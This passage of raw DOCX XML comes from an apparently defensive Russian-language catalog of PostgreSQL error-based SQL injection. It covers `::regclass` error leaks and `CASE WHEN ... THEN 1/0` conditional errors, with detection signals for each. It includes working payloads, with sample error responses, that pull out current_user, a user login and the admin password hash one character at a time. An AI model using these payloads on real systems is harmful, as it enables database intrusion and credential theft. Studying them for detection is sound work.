          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT ... FROM other_table)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не к колонке текущего FROM. Легитимный код кастит свои колонки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В подзапросе используется конкатенация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нескольких колонок — индикатор склейки данных для упаковки в одну ошибку.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каст применён к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current_database()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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Легитимная необходимость кастить эти функции к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не встречается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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появляется поток запросов с одинаковой формой, отличающихся только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OFFSET N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или подстрокой в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">substring(..., N, 1)</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 Текст ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid input syntax for type integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> стабилен.</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3.2.2, 3.2.3, 3.2.5, 3.3.</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PortSwigger SQL injection cheat sheet — Extracting data via verbose error messages; HackTricks: PostgreSQL injection; PostgreSQL Documentation: Type Conversion, Error Message Reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2 `::regclass` — leak через несуществующее отношение</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Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'name'::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пытается разрезолвить строку как имя отношения. Если такого отношения нет, PG выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relation "&lt;name&gt;" does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> это полная исходная строка (с учётом truncation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тот же, что в 3.2.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовое извлечение:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT (SELECT current_user)::regclass)</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(SELECT current_user)::regclass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ответ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: relation "app_user" does not exist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Гарантия несуществования через префикс — на случай, если значение случайно совпадёт с реальным именем таблицы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT ('x_' || (SELECT login FROM users LIMIT 1))::regclass)</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('x_' || (SELECT login FROM users LIMIT 1))::regclass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ответ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: relation "x_admin" does not exist</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То же, что в 3.2.1, но с принципиальным ограничением длины: имена отношений в PG ограничены </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NAMEDATALEN - 1 = 63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> байтами. Всё, что длиннее, молча обрезается перед попыткой резолва — атакующий получит ошибку для усечённой строки. Для длинных hashes/tokens этот канал требует chunking через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">substring(..., 1, 60)</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 это OID-тип, в качестве input-функции использующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">regclassin()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Функция парсит строку как имя relation и вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RangeVarGetRelid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если объект не найден — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">errmsg("relation \"%s\" does not exist", ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Truncation до 63 байт происходит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">truncate_identifier()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ещё до резолва. Каст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популярен у атакующих не из-за уникальных возможностей (по сравнению с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он строго слабее), а из-за читаемости payload-а и обхода фильтров, заточенных на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CAST(...)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Канал доставки ошибки (3.2.5). Значение для extraction не должно превышать 63 байта — иначе нужен chunking.</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встречается в DBA-скриптах для безопасной валидации имени таблицы, в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output, в миграциях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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применён к выражению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в легитимных контекстах имя таблицы либо литерал, либо берётся из metadata-таблицы как готовая строка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Префикс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'x_'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'invalid_' ||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, или любой другой маркер невалидности перед подзапросом — индикатор намеренного провала резолва.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Аргумент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 подзапрос </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT ... FROM users/products/orders)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к user-data таблицам, а не к metadata.</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3.2.1, 3.2.5.</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PortSwigger SQL injection cheat sheet; HackTricks: PostgreSQL injection — Error based; PostgreSQL Documentation: Object Identifier Types — regclass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 Условная ошибка через `CASE WHEN ... THEN 1/0`</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CASE WHEN cond THEN 1/0 ELSE 1 END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — гибрид error-based и boolean-blind. При истинном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cond</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">division by zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HTTP 500), при ложном — выражение возвращает 1 и запрос завершается успешно (HTTP 200). Атакующий читает данные побитово, превращая каждое условие в один HTTP-запрос.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тот же, что в 3.2.1, но канал работает даже без проброса текста ошибки наружу — достаточно различать HTTP 500 и HTTP 200.</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Проверка стартового символа пароля:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN (SELECT password_hash FROM users WHERE login='admin') LIKE 'a%' THEN 1/0 ELSE 1 END)</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CASE WHEN (SELECT password_hash FROM users WHERE login='admin') LIKE 'a%' THEN 1/0 ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если хеш начинается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'a'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ветка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вычисляется → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: division by zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → HTTP 500.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Иначе: подзапрос возвращает 1, основной запрос превращается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
